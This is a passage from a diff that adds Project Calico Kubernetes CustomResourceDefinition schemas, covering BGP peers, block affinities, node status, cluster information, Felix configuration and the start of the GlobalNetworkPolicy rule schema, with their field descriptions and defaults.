nodeSelector + is specified, then this BGP peer selects all nodes in the cluster. + type: string + nodeSelector: + description: Selector for the nodes that should have this peering. When + this is set, the Node field must be empty. + type: string + password: + description: Optional BGP password for the peerings generated by this + BGPPeer resource. + properties: + secretKeyRef: + description: Selects a key of a secret in the node pod's namespace. + properties: + key: + description: The key of the secret to select from. Must be + a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be + defined + type: boolean + required: + - key + type: object + type: object + peerIP: + description: The IP address of the peer followed by an optional port + number to peer with. If port number is given, format should be `[]:port` + or `:` for IPv4. If optional port number is not set, + and this peer IP and ASNumber belongs to a calico/node with ListenPort + set in BGPConfiguration, then we use that port to peer. + type: string + peerSelector: + description: Selector for the remote nodes to peer with. When this + is set, the PeerIP and ASNumber fields must be empty. For each + peering between the local node and selected remote nodes, we configure + an IPv4 peering if both ends have NodeBGPSpec.IPv4Address specified, + and an IPv6 peering if both ends have NodeBGPSpec.IPv6Address specified. The + remote AS number comes from the remote node's NodeBGPSpec.ASNumber, + or the global default if that is not set. + type: string + sourceAddress: + description: Specifies whether and how to configure a source address + for the peerings generated by this BGPPeer resource. Default value + "UseNodeIP" means to configure the node IP as the source address. "None" + means not to configure a source address. + type: string + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: blockaffinities.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: BlockAffinity + listKind: BlockAffinityList + plural: blockaffinities + singular: blockaffinity + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: BlockAffinitySpec contains the specification for a BlockAffinity + resource. + properties: + cidr: + type: string + deleted: + description: Deleted indicates that this block affinity is being deleted. + This field is a string for compatibility with older releases that + mistakenly treat this field as a string. + type: string + node: + type: string + state: + type: string + required: + - cidr + - deleted + - node + - state + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: (devel) + creationTimestamp: null + name: caliconodestatuses.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: CalicoNodeStatus + listKind: CalicoNodeStatusList + plural: caliconodestatuses + singular: caliconodestatus + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: CalicoNodeStatusSpec contains the specification for a CalicoNodeStatus + resource. + properties: + classes: + description: Classes declares the types of information to monitor + for this calico/node, and allows for selective status reporting + about certain subsets of information. + items: + type: string + type: array + node: + description: The node name identifies the Calico node instance for + node status. + type: string + updatePeriodSeconds: + description: UpdatePeriodSeconds is the period at which CalicoNodeStatus + should be updated. Set to 0 to disable CalicoNodeStatus refresh. + Maximum update period is one day. + format: int32 + type: integer + type: object + status: + description: CalicoNodeStatusStatus defines the observed state of CalicoNodeStatus. + No validation needed for status since it is updated by Calico. + properties: + agent: + description: Agent holds agent status on the node. + properties: + birdV4: + description: BIRDV4 represents the latest observed status of bird4. + properties: + lastBootTime: + description: LastBootTime holds the value of lastBootTime + from bird.ctl output. + type: string + lastReconfigurationTime: + description: LastReconfigurationTime holds the value of lastReconfigTime + from bird.ctl output. + type: string + routerID: + description: Router ID used by bird. + type: string + state: + description: The state of the BGP Daemon. + type: string + version: + description: Version of the BGP daemon + type: string + type: object + birdV6: + description: BIRDV6 represents the latest observed status of bird6. + properties: + lastBootTime: + description: LastBootTime holds the value of lastBootTime + from bird.ctl output. + type: string + lastReconfigurationTime: + description: LastReconfigurationTime holds the value of lastReconfigTime + from bird.ctl output. + type: string + routerID: + description: Router ID used by bird. + type: string + state: + description: The state of the BGP Daemon. + type: string + version: + description: Version of the BGP daemon + type: string + type: object + type: object + bgp: + description: BGP holds node BGP status. + properties: + numberEstablishedV4: + description: The total number of IPv4 established bgp sessions. + type: integer + numberEstablishedV6: + description: The total number of IPv6 established bgp sessions. + type: integer + numberNotEstablishedV4: + description: The total number of IPv4 non-established bgp sessions. + type: integer + numberNotEstablishedV6: + description: The total number of IPv6 non-established bgp sessions. + type: integer + peersV4: + description: PeersV4 represents IPv4 BGP peers status on the node. + items: + description: CalicoNodePeer contains the status of BGP peers + on the node. + properties: + peerIP: + description: IP address of the peer whose condition we are + reporting. + type: string + since: + description: Since the state or reason last changed. + type: string + state: + description: State is the BGP session state. + type: string + type: + description: Type indicates whether this peer is configured + via the node-to-node mesh, or via en explicit global or + per-node BGPPeer object. + type: string + type: object + type: array + peersV6: + description: PeersV6 represents IPv6 BGP peers status on the node. + items: + description: CalicoNodePeer contains the status of BGP peers + on the node. + properties: + peerIP: + description: IP address of the peer whose condition we are + reporting. + type: string + since: + description: Since the state or reason last changed. + type: string + state: + description: State is the BGP session state. + type: string + type: + description: Type indicates whether this peer is configured + via the node-to-node mesh, or via en explicit global or + per-node BGPPeer object. + type: string + type: object + type: array + required: + - numberEstablishedV4 + - numberEstablishedV6 + - numberNotEstablishedV4 + - numberNotEstablishedV6 + type: object + lastUpdated: + description: LastUpdated is a timestamp representing the server time + when CalicoNodeStatus object last updated. It is represented in + RFC3339 form and is in UTC. + format: date-time + nullable: true + type: string + routes: + description: Routes reports routes known to the Calico BGP daemon + on the node. + properties: + routesV4: + description: RoutesV4 represents IPv4 routes on the node. + items: + description: CalicoNodeRoute contains the status of BGP routes + on the node. + properties: + destination: + description: Destination of the route. + type: string + gateway: + description: Gateway for the destination. + type: string + interface: + description: Interface for the destination + type: string + learnedFrom: + description: LearnedFrom contains information regarding + where this route originated. + properties: + peerIP: + description: If sourceType is NodeMesh or BGPPeer, IP + address of the router that sent us this route. + type: string + sourceType: + description: Type of the source where a route is learned + from. + type: string + type: object + type: + description: Type indicates if the route is being used for + forwarding or not. + type: string + type: object + type: array + routesV6: + description: RoutesV6 represents IPv6 routes on the node. + items: + description: CalicoNodeRoute contains the status of BGP routes + on the node. + properties: + destination: + description: Destination of the route. + type: string + gateway: + description: Gateway for the destination. + type: string + interface: + description: Interface for the destination + type: string + learnedFrom: + description: LearnedFrom contains information regarding + where this route originated. + properties: + peerIP: + description: If sourceType is NodeMesh or BGPPeer, IP + address of the router that sent us this route. + type: string + sourceType: + description: Type of the source where a route is learned + from. + type: string + type: object + type: + description: Type indicates if the route is being used for + forwarding or not. + type: string + type: object + type: array + type: object + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: clusterinformations.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: ClusterInformation + listKind: ClusterInformationList + plural: clusterinformations + singular: clusterinformation + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + description: ClusterInformation contains the cluster specific information. + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: ClusterInformationSpec contains the values of describing + the cluster. + properties: + calicoVersion: + description: CalicoVersion is the version of Calico that the cluster + is running + type: string + clusterGUID: + description: ClusterGUID is the GUID of the cluster + type: string + clusterType: + description: ClusterType describes the type of the cluster + type: string + datastoreReady: + description: DatastoreReady is used during significant datastore migrations + to signal to components such as Felix that it should wait before + accessing the datastore. + type: boolean + variant: + description: Variant declares which variant of Calico should be active. + type: string + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: felixconfigurations.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: FelixConfiguration + listKind: FelixConfigurationList + plural: felixconfigurations + singular: felixconfiguration + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + description: Felix Configuration contains the configuration for Felix. + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: FelixConfigurationSpec contains the values of the Felix configuration. + properties: + allowIPIPPacketsFromWorkloads: + description: 'AllowIPIPPacketsFromWorkloads controls whether Felix + will add a rule to drop IPIP encapsulated traffic from workloads + [Default: false]' + type: boolean + allowVXLANPacketsFromWorkloads: + description: 'AllowVXLANPacketsFromWorkloads controls whether Felix + will add a rule to drop VXLAN encapsulated traffic from workloads + [Default: false]' + type: boolean + awsSrcDstCheck: + description: 'Set source-destination-check on AWS EC2 instances. Accepted + value must be one of "DoNothing", "Enable" or "Disable". [Default: + DoNothing]' + enum: + - DoNothing + - Enable + - Disable + type: string + bpfConnectTimeLoadBalancingEnabled: + description: 'BPFConnectTimeLoadBalancingEnabled when in BPF mode, + controls whether Felix installs the connection-time load balancer. The + connect-time load balancer is required for the host to be able to + reach Kubernetes services and it improves the performance of pod-to-service + connections. The only reason to disable it is for debugging purposes. [Default: + true]' + type: boolean + bpfDataIfacePattern: + description: BPFDataIfacePattern is a regular expression that controls + which interfaces Felix should attach BPF programs to in order to + catch traffic to/from the network. This needs to match the interfaces + that Calico workload traffic flows over as well as any interfaces + that handle incoming traffic to nodeports and services from outside + the cluster. It should not match the workload interfaces (usually + named cali...). + type: string + bpfDisableUnprivileged: + description: 'BPFDisableUnprivileged, if enabled, Felix sets the kernel.unprivileged_bpf_disabled + sysctl to disable unprivileged use of BPF. This ensures that unprivileged + users cannot access Calico''s BPF maps and cannot insert their own + BPF programs to interfere with Calico''s. [Default: true]' + type: boolean + bpfEnabled: + description: 'BPFEnabled, if enabled Felix will use the BPF dataplane. + [Default: false]' + type: boolean + bpfExtToServiceConnmark: + description: 'BPFExtToServiceConnmark in BPF mode, control a 32bit + mark that is set on connections from an external client to a local + service. This mark allows us to control how packets of that connection + are routed within the host and how is routing intepreted by RPF + check. [Default: 0]' + type: integer + bpfExternalServiceMode: + description: 'BPFExternalServiceMode in BPF mode, controls how connections + from outside the cluster to services (node ports and cluster IPs) + are forwarded to remote workloads. If set to "Tunnel" then both + request and response traffic is tunneled to the remote node. If + set to "DSR", the request traffic is tunneled but the response traffic + is sent directly from the remote node. In "DSR" mode, the remote + node appears to use the IP of the ingress node; this requires a + permissive L2 network. [Default: Tunnel]' + type: string + bpfKubeProxyEndpointSlicesEnabled: + description: BPFKubeProxyEndpointSlicesEnabled in BPF mode, controls + whether Felix's embedded kube-proxy accepts EndpointSlices or not. + type: boolean + bpfKubeProxyIptablesCleanupEnabled: + description: 'BPFKubeProxyIptablesCleanupEnabled, if enabled in BPF + mode, Felix will proactively clean up the upstream Kubernetes kube-proxy''s + iptables chains. Should only be enabled if kube-proxy is not running. [Default: + true]' + type: boolean + bpfKubeProxyMinSyncPeriod: + description: 'BPFKubeProxyMinSyncPeriod, in BPF mode, controls the + minimum time between updates to the dataplane for Felix''s embedded + kube-proxy. Lower values give reduced set-up latency. Higher values + reduce Felix CPU usage by batching up more work. [Default: 1s]' + type: string + bpfLogLevel: + description: 'BPFLogLevel controls the log level of the BPF programs + when in BPF dataplane mode. One of "Off", "Info", or "Debug". The + logs are emitted to the BPF trace pipe, accessible with the command + `tc exec bpf debug`. [Default: Off].' + type: string + chainInsertMode: + description: 'ChainInsertMode controls whether Felix hooks the kernel''s + top-level iptables chains by inserting a rule at the top of the + chain or by appending a rule at the bottom. insert is the safe default + since it prevents Calico''s rules from being bypassed. If you switch + to append mode, be sure that the other rules in the chains signal + acceptance by falling through to the Calico rules, otherwise the + Calico policy will be bypassed. [Default: insert]' + type: string + dataplaneDriver: + type: string + debugDisableLogDropping: + type: boolean + debugMemoryProfilePath: + type: string + debugSimulateCalcGraphHangAfter: + type: string + debugSimulateDataplaneHangAfter: + type: string + defaultEndpointToHostAction: + description: 'DefaultEndpointToHostAction controls what happens to + traffic that goes from a workload endpoint to the host itself (after + the traffic hits the endpoint egress policy). By default Calico + blocks traffic from workload endpoints to the host itself with an + iptables "DROP" action. If you want to allow some or all traffic + from endpoint to host, set this parameter to RETURN or ACCEPT. Use + RETURN if you have your own rules in the iptables "INPUT" chain; + Calico will insert its rules at the top of that chain, then "RETURN" + packets to the "INPUT" chain once it has completed processing workload + endpoint egress policy. Use ACCEPT to unconditionally accept packets + from workloads after processing workload endpoint egress policy. + [Default: Drop]' + type: string + deviceRouteProtocol: + description: This defines the route protocol added to programmed device + routes, by default this will be RTPROT_BOOT when left blank. + type: integer + deviceRouteSourceAddress: + description: This is the source address to use on programmed device + routes. By default the source address is left blank, leaving the + kernel to choose the source address used. + type: string + disableConntrackInvalidCheck: + type: boolean + endpointReportingDelay: + type: string + endpointReportingEnabled: + type: boolean + externalNodesList: + description: ExternalNodesCIDRList is a list of CIDR's of external-non-calico-nodes + which may source tunnel traffic and have the tunneled traffic be + accepted at calico nodes. + items: + type: string + type: array + failsafeInboundHostPorts: + description: 'FailsafeInboundHostPorts is a list of UDP/TCP ports + and CIDRs that Felix will allow incoming traffic to host endpoints + on irrespective of the security policy. This is useful to avoid + accidentally cutting off a host with incorrect configuration. For + back-compatibility, if the protocol is not specified, it defaults + to "tcp". If a CIDR is not specified, it will allow traffic from + all addresses. To disable all inbound host ports, use the value + none. The default value allows ssh access and DHCP. [Default: tcp:22, + udp:68, tcp:179, tcp:2379, tcp:2380, tcp:6443, tcp:6666, tcp:6667]' + items: + description: ProtoPort is combination of protocol, port, and CIDR. + Protocol and port must be specified. + properties: + net: + type: string + port: + type: integer + protocol: + type: string + required: + - port + - protocol + type: object + type: array + failsafeOutboundHostPorts: + description: 'FailsafeOutboundHostPorts is a list of UDP/TCP ports + and CIDRs that Felix will allow outgoing traffic from host endpoints + to irrespective of the security policy. This is useful to avoid + accidentally cutting off a host with incorrect configuration. For + back-compatibility, if the protocol is not specified, it defaults + to "tcp". If a CIDR is not specified, it will allow traffic from + all addresses. To disable all outbound host ports, use the value + none. The default value opens etcd''s standard ports to ensure that + Felix does not get cut off from etcd as well as allowing DHCP and + DNS. [Default: tcp:179, tcp:2379, tcp:2380, tcp:6443, tcp:6666, + tcp:6667, udp:53, udp:67]' + items: + description: ProtoPort is combination of protocol, port, and CIDR. + Protocol and port must be specified. + properties: + net: + type: string + port: + type: integer + protocol: + type: string + required: + - port + - protocol + type: object + type: array + featureDetectOverride: + description: FeatureDetectOverride is used to override the feature + detection. Values are specified in a comma separated list with no + spaces, example; "SNATFullyRandom=true,MASQFullyRandom=false,RestoreSupportsLock=". + "true" or "false" will force the feature, empty or omitted values + are auto-detected. + type: string + genericXDPEnabled: + description: 'GenericXDPEnabled enables Generic XDP so network cards + that don''t support XDP offload or driver modes can use XDP. This + is not recommended since it doesn''t provide better performance + than iptables. [Default: false]' + type: boolean + healthEnabled: + type: boolean + healthHost: + type: string + healthPort: + type: integer + interfaceExclude: + description: 'InterfaceExclude is a comma-separated list of interfaces + that Felix should exclude when monitoring for host endpoints. The + default value ensures that Felix ignores Kubernetes'' IPVS dummy + interface, which is used internally by kube-proxy. If you want to + exclude multiple interface names using a single value, the list + supports regular expressions. For regular expressions you must wrap + the value with ''/''. For example having values ''/^kube/,veth1'' + will exclude all interfaces that begin with ''kube'' and also the + interface ''veth1''. [Default: kube-ipvs0]' + type: string + interfacePrefix: + description: 'InterfacePrefix is the interface name prefix that identifies + workload endpoints and so distinguishes them from host endpoint + interfaces. Note: in environments other than bare metal, the orchestrators + configure this appropriately. For example our Kubernetes and Docker + integrations set the ''cali'' value, and our OpenStack integration + sets the ''tap'' value. [Default: cali]' + type: string + interfaceRefreshInterval: + description: InterfaceRefreshInterval is the period at which Felix + rescans local interfaces to verify their state. The rescan can be + disabled by setting the interval to 0. + type: string + ipipEnabled: + type: boolean + ipipMTU: + description: 'IPIPMTU is the MTU to set on the tunnel device. See + Configuring MTU [Default: 1440]' + type: integer + ipsetsRefreshInterval: + description: 'IpsetsRefreshInterval is the period at which Felix re-checks + all iptables state to ensure that no other process has accidentally + broken Calico''s rules. Set to 0 to disable iptables refresh. [Default: + 90s]' + type: string + iptablesBackend: + description: IptablesBackend specifies which backend of iptables will + be used. The default is legacy. + type: string + iptablesFilterAllowAction: + type: string + iptablesLockFilePath: + description: 'IptablesLockFilePath is the location of the iptables + lock file. You may need to change this if the lock file is not in + its standard location (for example if you have mapped it into Felix''s + container at a different path). [Default: /run/xtables.lock]' + type: string + iptablesLockProbeInterval: + description: 'IptablesLockProbeInterval is the time that Felix will + wait between attempts to acquire the iptables lock if it is not + available. Lower values make Felix more responsive when the lock + is contended, but use more CPU. [Default: 50ms]' + type: string + iptablesLockTimeout: + description: 'IptablesLockTimeout is the time that Felix will wait + for the iptables lock, or 0, to disable. To use this feature, Felix + must share the iptables lock file with all other processes that + also take the lock. When running Felix inside a container, this + requires the /run directory of the host to be mounted into the calico/node + or calico/felix container. [Default: 0s disabled]' + type: string + iptablesMangleAllowAction: + type: string + iptablesMarkMask: + description: 'IptablesMarkMask is the mask that Felix selects its + IPTables Mark bits from. Should be a 32 bit hexadecimal number with + at least 8 bits set, none of which clash with any other mark bits + in use on the system. [Default: 0xff000000]' + format: int32 + type: integer + iptablesNATOutgoingInterfaceFilter: + type: string + iptablesPostWriteCheckInterval: + description: 'IptablesPostWriteCheckInterval is the period after Felix + has done a write to the dataplane that it schedules an extra read + back in order to check the write was not clobbered by another process. + This should only occur if another application on the system doesn''t + respect the iptables lock. [Default: 1s]' + type: string + iptablesRefreshInterval: + description: 'IptablesRefreshInterval is the period at which Felix + re-checks the IP sets in the dataplane to ensure that no other process + has accidentally broken Calico''s rules. Set to 0 to disable IP + sets refresh. Note: the default for this value is lower than the + other refresh intervals as a workaround for a Linux kernel bug that + was fixed in kernel version 4.11. If you are using v4.11 or greater + you may want to set this to, a higher value to reduce Felix CPU + usage. [Default: 10s]' + type: string + ipv6Support: + type: boolean + kubeNodePortRanges: + description: 'KubeNodePortRanges holds list of port ranges used for + service node ports. Only used if felix detects kube-proxy running + in ipvs mode. Felix uses these ranges to separate host and workload + traffic. [Default: 30000:32767].' + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + logFilePath: + description: 'LogFilePath is the full path to the Felix log. Set to + none to disable file logging. [Default: /var/log/calico/felix.log]' + type: string + logPrefix: + description: 'LogPrefix is the log prefix that Felix uses when rendering + LOG rules. [Default: calico-packet]' + type: string + logSeverityFile: + description: 'LogSeverityFile is the log severity above which logs + are sent to the log file. [Default: Info]' + type: string + logSeverityScreen: + description: 'LogSeverityScreen is the log severity above which logs + are sent to the stdout. [Default: Info]' + type: string + logSeveritySys: + description: 'LogSeveritySys is the log severity above which logs + are sent to the syslog. Set to None for no logging to syslog. [Default: + Info]' + type: string + maxIpsetSize: + type: integer + metadataAddr: + description: 'MetadataAddr is the IP address or domain name of the + server that can answer VM queries for cloud-init metadata. In OpenStack, + this corresponds to the machine running nova-api (or in Ubuntu, + nova-api-metadata). A value of none (case insensitive) means that + Felix should not set up any NAT rule for the metadata path. [Default: + 127.0.0.1]' + type: string + metadataPort: + description: 'MetadataPort is the port of the metadata server. This, + combined with global.MetadataAddr (if not ''None''), is used to + set up a NAT rule, from 169.254.169.254:80 to MetadataAddr:MetadataPort. + In most cases this should not need to be changed [Default: 8775].' + type: integer + mtuIfacePattern: + description: MTUIfacePattern is a regular expression that controls + which interfaces Felix should scan in order to calculate the host's + MTU. This should not match workload interfaces (usually named cali...). + type: string + natOutgoingAddress: + description: NATOutgoingAddress specifies an address to use when performing + source NAT for traffic in a natOutgoing pool that is leaving the + network. By default the address used is an address on the interface + the traffic is leaving on (ie it uses the iptables MASQUERADE target) + type: string + natPortRange: + anyOf: + - type: integer + - type: string + description: NATPortRange specifies the range of ports that is used + for port mapping when doing outgoing NAT. When unset the default + behavior of the network stack is used. + pattern: ^.* + x-kubernetes-int-or-string: true + netlinkTimeout: + type: string + openstackRegion: + description: 'OpenstackRegion is the name of the region that a particular + Felix belongs to. In a multi-region Calico/OpenStack deployment, + this must be configured somehow for each Felix (here in the datamodel, + or in felix.cfg or the environment on each compute node), and must + match the [calico] openstack_region value configured in neutron.conf + on each node. [Default: Empty]' + type: string + policySyncPathPrefix: + description: 'PolicySyncPathPrefix is used to by Felix to communicate + policy changes to external services, like Application layer policy. + [Default: Empty]' + type: string + prometheusGoMetricsEnabled: + description: 'PrometheusGoMetricsEnabled disables Go runtime metrics + collection, which the Prometheus client does by default, when set + to false. This reduces the number of metrics reported, reducing + Prometheus load. [Default: true]' + type: boolean + prometheusMetricsEnabled: + description: 'PrometheusMetricsEnabled enables the Prometheus metrics + server in Felix if set to true. [Default: false]' + type: boolean + prometheusMetricsHost: + description: 'PrometheusMetricsHost is the host that the Prometheus + metrics server should bind to. [Default: empty]' + type: string + prometheusMetricsPort: + description: 'PrometheusMetricsPort is the TCP port that the Prometheus + metrics server should bind to. [Default: 9091]' + type: integer + prometheusProcessMetricsEnabled: + description: 'PrometheusProcessMetricsEnabled disables process metrics + collection, which the Prometheus client does by default, when set + to false. This reduces the number of metrics reported, reducing + Prometheus load. [Default: true]' + type: boolean + prometheusWireGuardMetricsEnabled: + description: 'PrometheusWireGuardMetricsEnabled disables wireguard + metrics collection, which the Prometheus client does by default, + when set to false. This reduces the number of metrics reported, + reducing Prometheus load. [Default: true]' + type: boolean + removeExternalRoutes: + description: Whether or not to remove device routes that have not + been programmed by Felix. Disabling this will allow external applications + to also add device routes. This is enabled by default which means + we will remove externally added routes. + type: boolean + reportingInterval: + description: 'ReportingInterval is the interval at which Felix reports + its status into the datastore or 0 to disable. Must be non-zero + in OpenStack deployments. [Default: 30s]' + type: string + reportingTTL: + description: 'ReportingTTL is the time-to-live setting for process-wide + status reports. [Default: 90s]' + type: string + routeRefreshInterval: + description: 'RouteRefreshInterval is the period at which Felix re-checks + the routes in the dataplane to ensure that no other process has + accidentally broken Calico''s rules. Set to 0 to disable route refresh. + [Default: 90s]' + type: string + routeSource: + description: 'RouteSource configures where Felix gets its routing + information. - WorkloadIPs: use workload endpoints to construct + routes. - CalicoIPAM: the default - use IPAM data to construct routes.' + type: string + routeTableRange: + description: Calico programs additional Linux route tables for various + purposes. RouteTableRange specifies the indices of the route tables + that Calico should use. + properties: + max: + type: integer + min: + type: integer + required: + - max + - min + type: object + serviceLoopPrevention: + description: 'When service IP advertisement is enabled, prevent routing + loops to service IPs that are not in use, by dropping or rejecting + packets that do not get DNAT''d by kube-proxy. Unless set to "Disabled", + in which case such routing loops continue to be allowed. [Default: + Drop]' + type: string + sidecarAccelerationEnabled: + description: 'SidecarAccelerationEnabled enables experimental sidecar + acceleration [Default: false]' + type: boolean + usageReportingEnabled: + description: 'UsageReportingEnabled reports anonymous Calico version + number and cluster size to projectcalico.org. Logs warnings returned + by the usage server. For example, if a significant security vulnerability + has been discovered in the version of Calico being used. [Default: + true]' + type: boolean + usageReportingInitialDelay: + description: 'UsageReportingInitialDelay controls the minimum delay + before Felix makes a report. [Default: 300s]' + type: string + usageReportingInterval: + description: 'UsageReportingInterval controls the interval at which + Felix makes reports. [Default: 86400s]' + type: string + useInternalDataplaneDriver: + type: boolean + vxlanEnabled: + type: boolean + vxlanMTU: + description: 'VXLANMTU is the MTU to set on the tunnel device. See + Configuring MTU [Default: 1440]' + type: integer + vxlanPort: + type: integer + vxlanVNI: + type: integer + wireguardEnabled: + description: 'WireguardEnabled controls whether Wireguard is enabled. + [Default: false]' + type: boolean + wireguardHostEncryptionEnabled: + description: 'WireguardHostEncryptionEnabled controls whether Wireguard + host-to-host encryption is enabled. [Default: false]' + type: boolean + wireguardInterfaceName: + description: 'WireguardInterfaceName specifies the name to use for + the Wireguard interface. [Default: wg.calico]' + type: string + wireguardListeningPort: + description: 'WireguardListeningPort controls the listening port used + by Wireguard. [Default: 51820]' + type: integer + wireguardMTU: + description: 'WireguardMTU controls the MTU on the Wireguard interface. + See Configuring MTU [Default: 1420]' + type: integer + wireguardRoutingRulePriority: + description: 'WireguardRoutingRulePriority controls the priority value + to use for the Wireguard routing rule. [Default: 99]' + type: integer + xdpEnabled: + description: 'XDPEnabled enables XDP acceleration for suitable untracked + incoming deny rules. [Default: true]' + type: boolean + xdpRefreshInterval: + description: 'XDPRefreshInterval is the period at which Felix re-checks + all XDP state to ensure that no other process has accidentally broken + Calico''s BPF maps or attached programs. Set to 0 to disable XDP + refresh. [Default: 90s]' + type: string + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: globalnetworkpolicies.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: GlobalNetworkPolicy + listKind: GlobalNetworkPolicyList + plural: globalnetworkpolicies + singular: globalnetworkpolicy + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + properties: + applyOnForward: + description: ApplyOnForward indicates to apply the rules in this policy + on forward traffic. + type: boolean + doNotTrack: + description: DoNotTrack indicates whether packets matched by the rules + in this policy should go through the data plane's connection tracking, + such as Linux conntrack. If True, the rules in this policy are + applied before any data plane connection tracking, and packets allowed + by this policy are marked as not to be tracked. + type: boolean + egress: + description: The ordered set of egress rules. Each rule contains + a set of packet match criteria and a corresponding action to apply. + items: + description: "A Rule encapsulates a set of match criteria and an + action. Both selector-based security Policy and security Profiles + reference rules - separated out as a list of rules for both ingress + and egress packet matching. \n Each positive match criteria has + a negated version, prefixed with \"Not\". All the match criteria + within a rule must be satisfied for a packet to match. A single + rule can contain the positive and negative version of a match + and both must be satisfied for the rule to match." + properties: + action: + type: string + destination: + description: Destination contains the match criteria that apply + to destination entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: 